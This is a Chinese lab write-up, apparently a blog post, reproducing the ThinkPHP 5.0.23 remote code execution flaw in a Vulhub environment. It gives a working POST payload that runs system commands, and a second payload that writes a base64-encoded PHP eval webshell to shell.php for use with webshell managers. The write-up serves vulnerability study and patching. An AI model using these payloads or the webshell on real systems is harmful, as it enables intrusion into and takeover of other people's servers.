ThinkPHP 5.0.23 远程代码执行 漏洞复现
ThinkPHP 5.0.23 远程代码执行 漏洞复现
- 一、漏洞描述
- 二、漏洞影响
- 三、漏洞复现
- 1、 环境搭建
- 2、 漏洞复现
- 四、漏洞POC
- 五、参考链接
- 六、利用工具
一、漏洞描述
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method
的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。
二、漏洞影响
ThinkPHP <= 5.0.24
三、漏洞复现
1、 环境搭建
使用 Vulhub 在服务器上搭建:
cd /vulhub/thinkphp/5.0.23-rce
docker-compose up -d
访问127.0.0.1:8080
,进入到主页面:
2、 漏洞复现
第一步:判断是否存在漏洞:
访问/index.php?s=captcha
页面,会出现如下报错:
使用 Google Chrome 的 HackBar 插件发送 POST 请求:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
得到回显:
whoami
命令成功执行。
第二步:漏洞利用
通过echo
命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码:
发送 POST 请求:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php
访问shell.php
:
可以发现一句话木马已经被解析,使用蚁剑、菜刀等 Webshell 管理工具连接:
四、漏洞POC
测试路径:
index.php?s=captcha
POST 传餐:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
五、参考链接
https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
https://www.dazhuanlan.com/2019/12/05/5de818364c3ac/
六、利用工具
TPscan
ThinkPHP 5.0.23 远程代码执行 漏洞复现相关推荐
- thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...
- php post 漏洞_ThinkPHP5 5.0.23 远程代码执行漏洞
作者介绍:Ice 国科学院安全学员,在国科学习安全课程,也参与在国科学生会安全团队中进行安全实战能力的提升.本次分享主要是针对现在一款运用极广的开发框架ThinkPHP的远程代码执行漏洞研究,希望给大 ...
- IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现
CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...
- [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- Office 远程代码执行漏洞复现过程
本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...
- Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...
- 用友NC BeanShell远程代码执行漏洞复现
用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...
- cve-2017-12617 tomcat远程代码执行漏洞复现测试
0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操 ...
- php 远程代码执行漏洞复现 cve-2019-11043
漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...
最新文章
- ISME:长期进化实验揭示脱硫弧菌的硝酸盐耐受机制
- 关于collect2: cannot find ld的解决办法
- 反向传播算法_反向传播算法:定义,概念,可视化
- Linux里的21究竟是什么
- WPF 依赖属性详解【转】
- 情人节,怎么同时约会女神和女朋友
- 升级到android studio 4.1后检测不到flutter、Dart插件
- [JAVA]字符串单词倒转处理前面的空格
- 拓端tecdat|R语言状态空间模型:卡尔曼滤波器KFAS建模时间序列
- 苹果雪豹操作系统正式版_如何不花一分钱用上iPhone11?更新iOS13正式版吧
- 含辞未吐,声若幽兰,史上最强免费人工智能AI语音合成TTS服务微软Azure(Python3.10接入)
- 今日早报 每日精选12条新闻简报 每天一分钟 知晓天下事 6月29日
- sdk 今日头条_今日头条商业SDK(激励视频)的坑
- linux网络协议栈ip_rcv
- Error while building/deploying project QTtest (kit: Desktop Qt 5.9.0 MinGW 32bit)When executing~
- char与varchar的区别?
- java中的instance_Java基础之Class类与instance关键字
- 剖析“Flash助手新鲜事 头条”弹窗小广告——Adobe竟和中国广告商同流合污!
- 深度分析 Java 的枚举类型:枚举的线程安全性及序列化问题
- ic芯片写卡软件的分类